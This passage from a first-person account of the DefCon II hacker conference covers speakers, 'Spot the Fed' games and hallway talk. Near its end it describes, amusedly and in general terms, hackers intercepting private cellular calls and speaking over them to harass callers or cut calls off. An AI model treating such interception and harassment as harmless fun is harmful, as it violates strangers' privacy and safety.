rescue. "He's not a Fed. He's a security guy and a writer." "Ugh! That's worse. Can I get a T-shirt cause he's a writer?" No way hacker-breath. Jeff. Jeff Moss. Not what I expected. I went to school with a thousand Jeff Mosses. While I had hair down to my waist, wearing paisley leather fringe jackets and striped bell bottoms so wide I appeared to be standing on two inverted ice cream cones, the Jeff Mosses of the world kept their parents proud. Short, shsort cropped hair, acceented by an ashen pall and clothes I stlll wouldn't wear today. They could get away with anything cause they didn't look the part of radical chic. Jeff, I really like Jeff: he doesn't look like what he represents. Bruce Edelstein, (now of HP fame) used to work for me. He was hipper than hip but looked squarer than square. Now today that doesn't mean as much as it used to, but we ex-30-somethings have a hard time forgetting what rebellion was about. (I was suspended 17 times in the first semester of 10th grade for wearing jeans.) Jeff would fit into a Corporate Board Meeting if he wore the right suit and uttered the right eloquencies: Yes, that's it: A young Tom Hanks. Right. I used to hate Tom Hanks (Splach, how fucking stupid except for the TV-picture tube splitting squeals) but I've come to respect the hell out of him as an actor. Jeff never had to pass through that first phase. I instantly liked him and certainly respect his ability to pull off a full fledged conference for only $5000. You read right. Five grand and off to Vegas with 300 of your closest personal friends, Feds in tow, for a weekend of electronic debauchery. "A few hundred for the brochure, a few hundred hear, a ton in phone bills, yeah, about $5000 if no one does any damage." Big time security shows cost $200,000 and up. I can honestly say without meaning anything pejorative at any of my friends and busienss acquaintances, that I do not learn 40 times as much at the 'real' shows. Something is definitely out of whack here. Suits want to see suits. Suits want to see fancy. Suits want to see form, substance be damned. Suits should take a lesson from my friend Jeff. * * * * * I again suffered through a tasteless Saharan buffer dinner which cost me a whopping $7.95. I hate grits -buttered sand is what I call them - but in this case might well have been preferable. Somehow I coerced a few hackers to join me in the ritualistic slaughter of our taste buds and torture of our intestines. They were not pleased with my choice of dining, but then who gives a shit? I couldn't anything anyway. Tough. To keep out minds off of the food we talked about something much more pleasant: the recent round of attacks on Pentagon computers and networks. "Are the same people involved as in the sniffing attacks earlier this year?" I asked my triad of dinner mates. "Indubitably." "And what's the reaction from the underground - other hackers?" Coughs, sniffs. Derivie visual feedback. Sneers. The finger. "We can't stand 'em. They're making it bad for everybody." Two fingers. By and large the DefCon II hackers are what I call 'good hackers' who hack, and maybe crack some systems upon occasion, but aren't what I refer to as Information Warriors in the bad sense of the word. This group claimed to extol the same position as most of the underground would: the Pentagon sniffing crackers - or whoever who is assaulting thousands of computers on the net - must be stopped. "Scum bags, that what they are." I asked that they not sugarcoat their feelings on my behalf. I can take it. "These fuckers are beyond belief; they're mean and don't give a shit how much damage they do." We played with our food only to indulge inthe single most palatable edible on display: ice cream with gobs of chocolate syrup with a side of coffee. . The big question was, what to do? The authorities are certainly looking for a legal response; perhaps another Mitnick or Phiber Optik. Much of the underground cheered when Mark Abene and others from the reknowned Masters of Destruction went to spend a vacation at the expense of the Feds. The MoD was up to no good and despite Abene's cries that there was no such thing as the MoD, he lost and was put away. However many hackers believe as I do, that sending Phiber to jail for hacking was the wrong punishment. Jail time won't solve anything nor cure a hacker from his first love. One might as well try to cure a hungry man from eating: No, Mark did wrong, but sending him to jail was wrong, too. The Feds and local computer cops and the courts have to come up with punishments appropriate to the crime. Cyber-crimes (or cyber-errors) should not be rewarded by a trip to an all male hotel where the favorite toy is a phallically carved bar of soap. On the other hand, hackers in general are so incensed over the recent swell of headline grabbing break-ins, and law enforcement has thus far appeared to be impotent, ("These guys are good.") that many are searching for alternative means of retribution. "An IRA style knee capping is in order," said one. "That's not good enough, not enough pain," chimed in another. (Sip, sip. I can almost taste the coffee.) "Are you guys serious?" I asked. Violence? You? I thought I knew them better than that. I know a lot of hackers, none that I know of is violent, and this extreme Pensacola retributition attitude seemed tottally out of character. "You really wouldn't do that, would you?" My dinner companions were so upset and they claimed to echo the sentiment of all good-hackers in good standing, that yes, this was a viable consideration. "The Feds aren't doing it, so what choice do we have? I've heard talk about taking up a collection to pay for a hit man . . ." Laughter around, but nervous laughter. "You wouldn't. . ." I insisted. "Well, probably not us, but that doesn't mean someone else doesn't won't do it." "So you know who's behind this whole thing." "Fucking-A we do," said yet another hacker chomping at the bit. He was obviously envisioning himself with a baseball bat in his hand. "So do the Feds." So now I find myself in the dilemma of publishing the open secret of who's behind the Internet sniffing and Pentagon break ins, but after talking to people from both the underground and law enforcement, I think I'll hold off awhile It serves no immediate purpose other than to warn off the offenders, and none of us want that. Obviously all is not well in hacker-dom. * * * * * The registration area was beyond full; computers, backpacks everywhere, hundreds of what I have to refer to as kids and a fair number of above ground security people. Padgett Peterson of Martin Marietta was going to talk about viruses, Sara Gorden on privacy, Mark Aldrich is a security guy from DC., and a bunch of other folks I see on the seemingly endless security trade show circuit. Jeff Moss had marketed himself and the show excellently. Los Angeles send a TV crew, John Markoff from the New York Times popped in as did a writer from Business Week. (And of course, yours truly.) Of the 360 registrees ("Plus whoever snuck in," added Jeff) I guess about 20% were so-called legitimate security people. That's not to belittle the mid-20's folks who came not because they were hackers, but because they like computers. Period. They hack for themselves and not on other systems, but DefCon II offered something for everyone. I remember 25 years ago how my parents hated the way I dressed for school or concerts or just to hang out: God forbid! We wore those damned jeans and T-shirts and sneakers or boots! "Why can't you dress like a human being," my mother admonished me day after day, year after year. So I had to check myself because I can't relate to Seattle grunge-ware. I'm just too damned old to wear shirts that fit like kilts or sequin crusted S&M leather straps. Other than the visual cacophony of dress, every single hacker/phreak that I met exceeded my expectations in the area of deportment. These are not wild kids on a rampage. The stories of drug-induced frenzies and peeing in the hallways and tossing entire rooms of furniture out of the window that emanated from the HoHoCons seemed a million miles away. This was admittedly an opportunity to party, but not to excess. There was work to be done, lessons to be learned and new friends to make. So getting snot nosed drunk or ripped to the tits or Ecstatically high was just not part of the equation. Not here. Now Vegas offers something quite distinct from other cities which host security or other conventions. At a Hyatt or a Hilton or any other fancy-ass over priced hotel, beers run $4 or $5 a crack plus you're expected to tip the black tied minimum wage worker for popping the top. The Sahara (for all of the other indignities we had to suffer) sosmewhat redeemed itself by offering an infinite supply of $1 Heinekens. Despite hundreds of beer bottle spread around the huge conference area (the hotel was definitely stingy in the garbage pail business) public drunkenness was totally absent. Party yes. Out of control? No way. Kudos! Surprisingly, a fair number of women (girls) attended. A handful were there 'for the ride' but others . . . whoa! they know their shit. I hope that's not sexist; merely an observation. I run around so few technically fluent ladies it's just a gut reaction. I wish there were more. In a former life, I owned a TV/Record production company called Nashville North. We specialized in country rock taking advantage of the Urban Cowboy fad in the late 1970's. Our crew of producers and engineers consisted of the "Nashville Angels." And boy what a ruckus they would cause when we recorded Charlie Daniels or Hank Williams: they were stunning. Susan produced and was a double fo Jacqueline Smith; we called Sally "Sabrina" because of her boyish appearance and resemblance to Kate Jackson. A super engineer. And there was Rubia Bomba, the Blond Bombshell, Sherra, who I eventually married: she knew country music inside and out - after all she came from Nashville in the first place. When we would be scheduled to record an act for live radio, some huge famous country act like Asleep at The Wheel of Merle Haggard or Johnny Paycheck or Vassar Clements, she would wince in disbelief when we cried, "who's that?" Needless to say, she knew the songs, the cues and the words. They all sounded alike. Country Music? Ecch. (So I learned.) At any rate, ladies, we're equal opportunity offenders. C'mon down and let's get technical. As the throngs pressed to register, I saw an old friend, Erik Bloodaxe. I've known him for several years now and he's even come over to baby sit the kids when he's in town. (Good practice.) Erik is about as famous as they come in the world of hackers. Above ground the authorities investigated him for his alleged participation in cyber crimes: after all, he was one of the founders of the Legion of Doom, and so, by default, he must have done something wrong. Never prosecuted, Erik Bloodaxe lives in infamy amongst his peers. To belay any naysayers, Erik appeared on every single T-shirt there. "I Only Hack For Money," Erik Bloodaxe proclaimed dozens of shirts wandering through the surveillance laden casinos. His is a name that will live in infamy. So I yelled out, "Hey Chris!" He gave his net-name to the desk/table registrar. "Erik Bloodaxe." "Erik Bloodaxe?" piped up an excited high pitched mail voice. "Where?" People pointed at Chris who was about to be embarrassingly amused by sweet little tubby Novocain who practically bowed at Chris's feet in reverence. "You're Erik Bloodaxe?" Novocain said with nervous awe - eyes gleaming up at Chris's ruddy skin and blond pony-tail. "Yeah," Chris said in the most off handed way possible. For people who don't know him this might be interpreted as arrogance (and yes there is that) but he also has trouble publicly accepting the fame and respect that his endearing next-generation teenage fans pour on him. "Wow!" Novocain said with elegance and panache. "You're Erik Bloodaxe." We'd just been through that said Chris's eyes. "Yeah." "Wow, well, um, I . . . ah . . . you're . . . I mean, wow, you're the best." What does Sylvia Jane Miller from Rumpsteer, Iowa say to a movie star? This about covered it. The Midwest meets Madonna. "Wow!" Only here it's Novocain meets Cyber Christ himself. Like any other security show or conference or convention there is a kickoff, generally with a speech. And DefCon II was no exception. Except. Most conventional conventions (ConCons) start at 7:30 or 8:00 AM because, well I don't know exactly why, except that' when so- called suits are expected to show up in their cubicles. DefCon, on the other hand, was scheduled to start at 10PM on Friday night when most hakcers show up for work. Most everyone had arrived and we were anxiously awaiting the opening ceremonies. But, here is where Jeff's lack of experience came in. The kick- off speaker was supposed to be Mark Ludwig of virus writing fame and controversy. But, he wasn't there! He had jet lag. "From Phoenix?" I exclaimed in mock horror to which nearby hackers saw the absurdity of a 45 minute flight jet lag. Mark has a small frame and looks, well, downright weak, so I figured maybe flying and his constitution just didn't get along and he was massaging his swollen adenoids in his room. "Oh, no! He's just come in from Australia . . ." Well that explains it, alright! Sorry for the aspersions, Mark. But Jeff didn't have a back up plan. He was screwed. Almost four hundred people in the audience and nothing to tell them. So, and I can't quite believe it, one human being who had obviously never stood in front of a live audience before got up in an impromptu attempt at stand up comedy. The audience was ready for almost anything entertaining but this guy wasn't. Admittedly it was a tough spot, but . . . "How do you turn a 496 into an 8088?" "Add Windows." Groan. Groan. "What's this?" Picture the middle three fingers of your right hand wiggling madly. "An encrypted this!" Now hold out just the middle finger. Groan. Groan. "What's this?" Spread your legs slightly apart, extend both hands to the front and move them around quickly in small circles "Group Air Mouse." Groan. The evening groaned on with no Mark nor any able sharp witted comedian in sight. Phil Zimmerman wrote PGP and is a God, if not Cyber-Christ himself to much of the global electronic world. Preferring to call himself a folk hero (even the Wall Street Journal used that term) Phil's diminutive height combined with a few too many pounds and a sweet as sweet can be smile earn him the title of Pillsbury Dough Boy look alike. Phil is simply too nice a guy to be embroiled in a Federal investigation to determine if he broke the law by having PGP put on a net site. You see, the Feds still think they can control Cyberspace, and thereby maintain antique export laws: "Thou shalt not export crypto without our approval" sayeth the NSA using the Department of Commerce as a whipping boy mouth piece. So now Phil faces 41-51 months of mandatory jail time if prosecuted and convicted of these absurd laws. Flying in from Colorado, his appearance was anxiously awaited. "He's really coming?" " I wonder what he's like?" (Like eevryone else, fool, just different.) When he did arrive, his shit- eating grin which really isn't a shit-eating grin, it's just Phil's own patented grin, preceeded him down the hallway. "Here he is!" "It's Phil Zimmerman." Get down and bow. "Hey, Phil the PGP dude is here." He was instantly surrounded by those who recognize him and by both those who don't but want to feel like part of the in-crowd. Chat chat, shit-eating grin, good war stories and G-rated pleasantries. Phil was doing what he does best: building up the folk hero image of himself. His engaging personality (even though he can't snorkel to save his ass) mesmerized the young-uns of the group. "You're Phil?" "Yeah." No arrogance, just a warm country shit-eating grin that's not really shit-eating. Just Phil being Phil. He plays the part perfectly. Despite the attention, the fame, the glory (money? nah . . .) the notoriety and the displeased eyes of onlooking Computer Cops who really do believe he belongs in jail for 4 years, Phil had a problem tonight. A real problem. "I don't have a room!" he quietly told Jeff at the desk. "They say I'm not registered." Np panic. Just a shit-eating grin that's not a shit-eating grin and hand the problem over the experts: in this case Jeff Moss. Back to his endearing fans. Phil is so damned kind I actually saw him giving Cryptography 101 lessons on the corner of a T-shirt encrusted table. "This is plaintext and this is crypto. A key is like a key to your hotel room . . . " If Phil had a hotel room. Someone had screwed up. Damn computers. So the search was on. What had happened to Phil's room? Jeff is scrambling and trying to get the hotel to rectify the situation Everyone was abuzz. Phil, the crypto-God himself was left out in the cold. What would he do? When suddenly, out of the din in the halls, we heard one voice above all the rest: "Phil can sleep with me!" Silence. Dead stone cold silence. Haunting silence like right after an earthquake and even the grubs and millipedes are so shaken they have nothing to say. Silence. The poor kid who had somehow instructed his brain to utter the words and permitted them to rise through his esophagus and out over his lips stood the object of awe, incredulity and mental question marks. He must have thought to himself, "what's everyone staring at? What's going on? Let me in on it." For the longest 10 seconds in the history of civilization he had absolutely no clue that he was the target of attention. A handful of people even took two or three steps back, just in case. Just in case of what was never openly discussed, but nonetheless, just in case. And then the brain kicked in and a weak sheepish smile of guilt overcame this cute acne-free baby-butt smooth-faced hacker who had certainly never had a shave, and was barely old enough to steer his own pram. "Ohhhhhh . . . . noooooo," he said barely louder than a whisper. "That' not what I mean!" I nearly peed laughing so hard in unison with a score of hackers who agreed that these misspoken words put this guy in the unenviable position of being the recipient of a weekend of eternal politically incorrect ridicule. "Yeah, right. We know what you mean . . " "No really . . ." he pleaded as the verbal assaults on his alleged sexual preferences were slung one after the other. This poor kid never read Shakespeare: "He who doth protest too much . . ." If we couldn't have a great kickoff speech, or comedian, this would have to do. The majority of the evening was spent making acquaintances: "Hi, I'm Jim. Oops, I mean 'Septic Tank," was greeted with "Oh, you're Septic. I'm Sour Milk." (Vive la difference!) People who know each other electronically are as surprised to meet their counterparts as are first daters who are in love with the voice at the other end of the phone. "Giving good phone" implies one thing while "Having a great keystroke" just might mean another. The din of the crowd was generally penetrated by the sounds of a quasi-pornographic Japanese high tech toon of questionable socially redeeming value which a majority of the crowd appeared to both enjoy and understand. I am guilty of neither by reason of antiquity. And so it goes. * * * * * Phil Zimmerman must have gotten a room and some sleep because at 10AM (or closely thereafter) he gave a rousing (some might say incendiary) speech strongly attacking the government's nearly indefensible position on export control I was really impressed. Knowing Phil for some time, this was the first time I ever heard him speak and he did quite an admirable job. He ad libs, talks about what he want to talk about and does so in a compelling and emotional way. His ass is on the line and he should be emotional about it. The audience, indeed much of counter culture Cyberspace loves Phil and just about anything he has to say. His affable 40-something attorney from Colorado, Phil DuBois was there to both enjoy the festivities and, I'm sure, to keep tabs on Phil's vocalizations. Phil is almost too honest and open for his own good. Rounds and rounds of sincere appreciation. Hey kids, now it's time for another round of Spot The Fed. Here's your chance to win one of these wonderful "I Spotted A Fed" T-shirts. and all you have to do is ID a fed and it's yours. Look around you? Is he a Fed? Is she under cover or under the covers? Heh, heh. Spot the Fed and win a prize. This one-size- fits-all XXX Large T-shirt is yours if you Spot the Fed. I had to keep silent. That would have been cheating. I hang out on both sides and have a reputation to maintain. "Hey, I see one" screeched a female voice (or parhaps it was Phil's young admirer) from the left side of the 400+ seat ballroom. Chaos! Where? Where? Where's the fed? Like when Jose Consenko hits one towards the center field fence and 70,000 screaming fans stand on their seats to get a better view of a ball 1/4 mile away flying at 150 miles per hour, this crowd stood like Lemmings in view of Valhalla the Cliff to espy the Fed. Where's the Fed? Jeff jumped off the stage in anxious anticipation that yet another anti-freedom-repressive law enforcement person had blown his cover. Where's the Fed? Jeff is searching for the accuser and the accused. Where's the Fed? Craned necks as far as the eye can see; no better than rubber neckers on Highway 95 looking for steams of blood and misplaced body parts they half expected a Fed to be as distinctly obvious as Quasimoto skulking under the Gorgoyled parapits of Notre Dame. No such like. They look like you and me. (Not me.) Where's the Fed? He's getting closer, closer to the Fed. Is it a Fed? Are you a Fed? C'mon, fess up. You're a a fed. Nailed. Busted. Psyche! Here's your T-shirt. More fun than Monty Hall bringing out aliens from behind Door #3 on the X-Files. Good clean fun. But they didn't get 'em all. A couple of them were real good. Must have been dressed like an Hawaiian surf bum or banshee from Hellfire, Oregon. Kudos to those Feds I know never got spotted. Next year, guys. There's always next year. Phil's notoriety and the presence of the Phoenix,Arizona prosecutor who was largely responsible for the dubiously effective or righteous Operation Sun Devil, Gail Thackeray ("I change job every 4 years or so - right after an election") brought out the media. The LA TV station thought they might have the makings of a story and sent a film crew for the event. "They're Feds. The ones with the cameras are Feds. I know it. Go ask 'em." No need. Not. "Put away that camera." At hacking events it's proper etiquette to ask if people are camera shy before shooting. The guy that I was sitting next to buried his face in his hands to avoid being captured on video tape. "What are you; a Fed or a felon?" I had to ask. "What's the difference," his said. "They're the same thing." So which was it, I wondered. For the truly paranoid by the truly paranoid. "Get that thing outta here," he motioned to the film crew who willingly obliged by turning off the lights. "They're really Feds," he whispered to me loud enough for the row in front and behind us to hear. I moved on. Can't take chances with personal safety when I have kids to feed. Fed or felon, he scared me. Gail Thackeray: was the next act on stage. She was less in agreement about Phil Zimmerman than probably anyone (except the undetected Feds) in the audience. She, as expected, endorsed much of the law enforcement programs that revolve around various key management (escrow) schemes. Phil recalls a letter from Burma that describe how the freedom fighters use PGP to defend themselves against repression. He cites the letter from Latvia that says electronic freedom as offered by PGP is one of the only hopes for the future of a free Russia. Gail empathizes but sees trouble closer to home. Terrorism a la World Trade Center, or rocket launchers at O'Hare Airport, or little girl snuff films in Richmond, Virginia, or the attempt to poison the water supply outside of Boston. These are the real threats to America in the post Cold War era. "What about our personal privacy!" cries a voice. "We don't want the government listening in. It's Big Brother 10 years behind schedule." Gail is amused. She knew it would be a tough audience and has been through it before. She is not shaken in the least. "I've read your mail," she responds. "Its not all that interesting." The audience appreciates a good repartee. "You gotta pay me to do this, and frankly most of it is pretty boring." She successful made her point and kept the audience laughing all the way. She then proceeded to tell that as she sees it, "The expectation of privacy isn't real." I really don't like hearing this for I believe in the need for an Electronic Bill of Rights. I simply think she's wrong. "History is clear," she said "the ability to listen in used to be limited to the very few. The telegraph was essentially a party line and still today in some rural areas communications have never been private. Why should we change it now?" "Gail, you're so full of shit!" A loud voice bellowed from next me again. Boy can I pick seats. "You know perfectly well that cops abuse the laws and this will just make their jobs easier. Once people find a way to escape tyranny you all want to bring it right back again. This is revolution and you're scared of losing. This kind of puke scum you're vomiting disgusts me. I just can't take it any more. " Yeah, right on. Scattered applause. While this 'gent' may have stated what was on many minds, his manner was most unbefitting a conference and indeed, even DefCon II. This was too rude even for a hacker get-together. The man with the overbearing comments sat down apologizing. "She just gets me going, she really does. Really pisses me off when she goes on like about how clean the Feds are. She knows better than to run diarrhea of the mouth like that." "You know," she continued. "Right across the street is a Spy Shop. One of those retail stores where you can buy bugs and taps and eavesdropping equipment?" The audience silently nodded. "We as law enforcement are prohibited by law from shopping there and buying those same things anyone else can. We're losing on that front." Cheers. Screw the Feds. I don't agree with ever thing that Gail says, but she is a compelling speaker; she believes in what she says. But I do agree with her on the difficulty of forensic evidence in computer cases." "I got really mad," she said. "I was reading a magazine and there was an ad for United, you know, the employee owned airline. And it was a beautiful ad, hundred of employees standing in front of a brand new great big jet. All smiling and happy." Gail then frowned deeply. "Some stockholder ought to sue them for misleading advertising." This was more like it! Go, Gail! "I started to look at the picture carefully and I noticed this unmistakably fat lady in a pink dress. And then over a few persons. . .guess what? The same fat lady in pink." Roars of laughter and applause. Her point? What seems real may not be real at all, and with a few hundred dollars in software and a little practice, most anyone can build a false reality digitally. Her time was up but the audience wanted more. She was mobbed for eternity by hackers who fight her tooth and nail but respect her comportment enough to make the disagreements lively, partisan, entertaining, but with respect. Respectful hackers. No HoHoCon orgies; merely verbal barbs with no solution. Everyone knew that, but it's the battle that counts. More security conference should be this open, this honest and informative, with all kinds of people with all kinds of opinions. That is how we, and I, learn. Listen and learn. And all for $5000 no less, plus a paltry $15 entrance fee. * * * * * The afternoon sessions were filled with a mixture of anti-government, pro-privacy advocacy, virus workshops and such by both under and above ground folks. Padgett Peterson's knowledge of viruses is deep and he spread the same wisdom as his does in so called legitimate circles. Knowledge is knowledge, and better accurate than wrong. It's often surprising to see how people will voice the same opinion in varying degree of intensity depending upon their audience. Mark Aldrich of General Research Corp. in the Washington area made a statement that I doubt I would hear at a ConCon. "Fear your government that fears your crypto. Use crypto as weapon." Sara Gordon's panel discussion on crypto and privacy and related topics fueled the audience's general anti-fed attitude. "I was bugged by the Feds." "So was I?" "What can we do about it." "Yeah, they listen in on my phones, too. I can hear the clicks." Right. As Mark so succinctly put it, "if the government wants to bug you, you'll never know. They're that good.". That kind of shut up the dilettante paranoids in the group, albeit mumbling that they just knew that they were the victim of one of the 900 or so court approved wire taps last year. Right. I think Gail was right: some of you guys are too boring to be believed. The afternoon edition of the Spot A Fed contest took us on the run. I actually succombed to their enthusiasm and the lack of mybetter judgement and followed a group of 8 or 10 to unmask an unmarked white van in the parking lot. "It's the Feds." "How do you know?" "Oh, it's the Feds alright." "How do you know." "It's a white van and the intelligence services use white vans." "What are you going to do?" "Bust 'em." "Bust 'em for what?" "For being Feds." This motley crew traipsed through the mile long casino, trodding upon the ugly tartan/paisley carpets so obnoxiously loud a blind man could cry "Uncle!", into the Hall of Overpriced Shoppes through the lobby and over to the parking garage. We had to have $100,000 of surveillance gear in tow: (enough to detect the plant Pluto fart in b-flat), Radio receivers and eavesdropping equipment were courtesy of my pal Mike Peros. The goal was, if this was a Fed van, we could hear it. I don't think so, but I go for the ride and a few minutes of reprieve away from the conference hall. As we near, the excitement grows among the more paranoid who are trying to instill their own mental foibles into their companions and sheer terror in normal old Vegas visitors who have no idea what they've walked into. Feds? Not. Surrepticious radio transmissions? Just hotel security tracking the movements of 8 or 10 paranoids (and one writer with nothing else todo for a half hour) into a parking garage which has more cameras than NBC. Feds? Of course not. Don't be ridiculous. * * * * * To say nothing worthwhile occurred until 11PM that evening would be lying, but this thing, this DefCon II thing, was turning into what I would have called 25 years ago, a Love-In. The participants were giddy from the event, the camaraderie, the $1 Heinekens and the hacking. The Sahara was actually pretty good about it. Jeff got the conference space for free because he guaranteed that at least 100 hotel rooms would be booked by "computer enthusiasts coming to a small computer conference." Little did the hotel know that half the crowd was too young to drink, to broke to gamble, and conspicuous enough to ward off legitimate clients. But a deal's a deal. The hotel operators went out of their way and allegedly gave the hackers permission to hack through the PBX in order to provide a SLPP connection. "Just put it back the way you found it when you're done," was the hotel's only and quite reasonable request. In my day an equivalent event producing an equivalent social non- drug induced high would have been achieved by tossing a Frisbee to Grace Slick (Lead singer Jefferson Airplane) and have her throw it back. We didn't have the kind of technology that today's rebellious age has. We had the Beatles and Jimi Hendrix, safe sex (kinda), safe drugs (well, maybe a little safer) and a cause. But no technology to speak of. When I was on the publishing staff of the New York City Free Press in 1968/9 we wrote our anti- establishment diatribes by hand. By hand! And then we went down to a dark office late at night to use their typesetting gear when it was idle. It took no more than a blushing glance around the room to realize that we impressionable teens were publishing our political extremisms on equipment courtesy of Al Goldstein and Screw magazine. Now that was an education. DefCon II was a Love-In, technology and all. Come 11PM yet another speaker canceled and I offered to chat to the crowd for a half hour or so on Van Eck radiation; the emissions from CRT's that make video screens readable from a distance. Now this wasn't a fill in at 5PM or anything. Sessions reconvened at 11PM and I spoke to a full audience who were there to get a midnight lesson in cellular hacking. Most above ground types still believe that hacking is an acne- faced teenager, sucking on Jolt Cola, wolfing down pepperoni pizza and causing Corporate America no end of grief. To a certain extent some of this is true. But hacking is so much more. As Rop Gongrijjp, editor of Hacktic once told me, "hacking is disrespect of technology." It's going the extra mile to find out how things work. Many of the older hackers, those in their early 20's and older, are migrating from the conventional dial-em-up and break-in hacking image to the fine art of cellular hacking. How do these things work? What are the frequencies? How can I customize my phone? How many channels can I scan? The possibilities are endless as I soon learned. Jim and Bill (fake names) asked if I wanted to see a great demo. Sure! No names, they said. OK. No problem. In one of the several thousand hotel rooms at the Sahara was a pile of equipment to make an under budgedted FBI surveillance team insanely jeaous. There in the middle of the ridiculously filthy room that no doubt caused the maid to shudder, sat a log periodic antenna poised atop a strong and highly adjustable photographic-style tripod. Feeding the antenna was a hunk of coax attached to a cell phone's antenna jack. OK, so that's that? Free cell calls? No, much more. A second cell phone/scanner, an Oki 900 was modified and connected to a laptop computer. (This was the exact modification being discussed downstairs) Custom software that was freely distributed around DefCon scanned the data from the Oki and displayed the scanning activity. A pair of speakers then audibly broadcast the specific conversation. And in Vegas, you can imagine what was going over the open airwaves! A half dozen 'kids' sat around enthralled, each begging for his turn to, as Jim put it, "harass cellular users. Ppure and simple. Harassment. Stomp on the son of a bitch," he laughed, joined in by the others. When a 'good' conversation was detected, they entered the channel into the broadcasting cell phone and spoke. And talk they did. Essentially they turned 'private' conversations into wide- band free-for-alls. If they spoke for only a few seconds one or both of the parties could hear what was being said. If they talked for too long, the overpowering signal from the antenna would literally wipe out the chat: the cell switch reacted with an internal signal to shut down. Stomping, they called it. For those on the receiving end of the harassment, it must have sounded like the overbearing voice of God telling Noah how to build the Ark. "Noah?" "Who dat? "Noah?" "Who is that?" What terror lurks in the minds of boys . . . For those old enough to remember, stomping is no more a stunt than putting a 500 watt linear power amplifier on a CB radio and blasting nearby CB's to kingdom come. The truckers used to do it to 4-wheelers. When the police began monitoring CB channels "to protect and serve" they became the target of CB stomping. So what else is new? I gotta give it to them: these characters designed and built the software, modified the phones and put it all together and it works! Not bad on a $3 allowance and a 10th grade education. Now, I guess what they did may have been sort of illegal, or at least highly unethical and definitely, not nice. But I have to admit, some of what I witnessed was very, very, funny. I'm not advocating this kind of activity, but much like Candid Camera broke in to people's lives to capture their reactions, cellular hacking is similarly amusing. The hacker/phreaks particularly enjoyed breaking in on fighting couples. (I counted six impending divorces.) Almost without exception the man was in a car and the lady was at a fixed location; presumably, home. Him: "Where the hell have you been." Her: "Nowhere." Him: "Bullshit. Her: "Really honey . . ." Defensively. Him: "Who's with you?" Intense anger. Hacker: "Don't believe her. She's a whore." Him: "What was that?" Her: "What?" "That voice." "What voice?" Hacker: "Me you asshole. Can't you see she's playing you for a fool." "I know she is." He agrees. "What's that honey?" "I know he's there with you." "Who?" Incredulous. "Him . . . whoever you're fucking when I'm at work." Hacker: "Yeah, it's me." "Shit! Who the fuck is there?" "No one!" "I can hear him, he's there. You're both making fun of me . . ." Hacker: "She's laughing at you, man." "No shit. Who the fuck are you?" Hacker: "The guy who takes care of her when you can't, asshole." "That's it." Click. Drug dealers aren't immune to these antics. "Where's the meet?" "By the 7/11 on Tropicana." "You got it?" "You got the cash?" "Yeah, dude." "Be sure you do." Hacker: "He doesn't have the cash my man. He's gonna rip you off." "What?" "What?" Both sides heard the intruder's voice. "Who is that?" "What's that about a rip-off?" "This ain't no rip-off man." Hacker: "Yes it is. Tell 'em the truth. You gonna take his drugs and shoot his ass. Right? Tell 'em." "You gonna rip me off?" "No, man!" "Your homeboy says you gonna try and rip me off?" "What home boy?" Hacker: "Me, you bozo drug freak. Don't you know that shit can kill you?" Click. Good samaritanism pays off upon occasion. "Honey, hurry up." "I'm on the freeway. I'm coming." Hacker: "He's late. Let's save her ass." "What was that?" "What did you say honey?" "He said he was going to save your ass." "Who did?" "The guy on the radio." (Technical ignorance abounds.) Hacker: "Me. You're late and she's scared so we're gonna beat you there and make her safe." "Who the hell is that?" "Who?" "The guy with you?" "There's no one here." "He says he's gonna beat me there and pick you up." Hacker: "Damn right we are." "Hey, this is cool. Who's there?" Hacker: "Cyber Christ talking to you from Silicon Heaven." "No shit. Really?" Hacker: "Yeah, (choke, choke,) really." "What's happening, honey." "I don't know, for sure. He says it's God." "God!?!?" Hacker: "Close enough. Listen, you sound alright. Go get your woman, man Keep her safe." "No problem. Uh, thanks." Click. Around 4AM, I guess it was, the hacker/phreaks definitely helped out law enforcement. One end of the conversation was coming from inside a hotel, maybe even the Sahara. The other from another cell phone, most likely in the lobby. "What do you look like?" "I'm five foot nine, thinning brown hair and 180 pounds I wear round glasses and . ." "I get the idea. Where are you now?" "I'm coming down the elevator now. What do you look like?" "I'm six foot one in my heels, have long blond spiked hair and black fishnet stockings." Hacker: "Don't go man. It's a bust." "What?" he said. Hacker: "Don't go, it's a bust. You don't want your name in the papers, do ya?" "What the fuck?" she yelled. "There's a guy who says this is a bust?" "Bust? What bust?" Hacker: "That's the clue, man. She's denying it. Of course it's a bust. Is it worth a night in jail to not get laid?" "Shit." He whispers not too quietly to another male companion. "There's some guy on the phone who says it's bust. What should we do." Hacker: "I'm telling you man, don't go," "This ain't worth it. I'm going back upstairs." Click. A couple of hours later the same hooker was overheard talking to one of her work mates. "Then this asshole says it's a bust. Cost me $300 in lost business, shit." "You, too? Same shit been going on all night long. What the fuck?" Wow. And it seems like only this morning that my toilet exploded. * * * * * So what's a perfectly groomed and slightly rotund 50-something convicted methamphetamine dealer doing at DefCon II with hundreds of impressionable teenagers? You might well ask. So I'll tell you. Sitting in yet another Saharan hell-hole of a room they unabashedly market for $55 per night I encountered hackers #1 through #4 and this . . . I immediately thought, elderly gent. He said nothing and neither did I, thinking that he might have been an over aged chaperone for delinquent teens or perhaps even an understanding Fed. But the gallon jugs of whiskey was depleting itself right before my eyes, as if a straw from Heaven sucked the manna from its innards. Actually, it was Bootleg. Not bootleg liquor, mind you, but Bootleg the felonious con from Oregon. Apparently he got busted 'cause speed is and was against the law, and crank is not exactly the drug choice of maiden aunts nor school marms. "I've been a hacker longer than some of these kids have been alive. It all started back in . . ." and Mike "Bootleg" Beketic commenced on the first of hundreds of war- story jail house tales to entertain him and us. Bootleg loves a good story. "Jail ain't so bad," he bragged with a huge whiskey smile. "No one fucked with me. You gotta make friends early on. Then it's OK." Good advice, I guess. "On parole I got slammed with a year for piss that didn't pass." Gotta be clean, my man. Stay away from that shit. It'll kill you and your teeth will rot. Bootleg handed me form PROB-37, (Rev. 1/94) from the United States District Court, Federal Probation System. Grins from ear to ear. A badge of honor for villains, thieves, and scoundrels. Sounds like they need their own union. This was the official "Permission To Travel" form dated June 16, 1994 which gave Bootleg the legal right to travel from Oregon to Las Vegas in the dead of the summer to attend a "computer convention." The flight times were specific as were the conditions of his freedom. He had to inform the local cops that he was in town. In case any crimes occurred throughout the city of Las Vegas during his sojourn, he was an easily identifiable suspect. While he downed another Jack and coke I found out what Bootleg was really doing. Despite the fact that the "Federal Keep Track of a Crook Travel Form" said, "you are prohibited from advertising or selling your DMV CD," the paranoia ran rampant through the minds of prison bureaucracy was actually in this case quite correctly concerned. "What's a DMV CD?" "I'm glad you asked." I was set 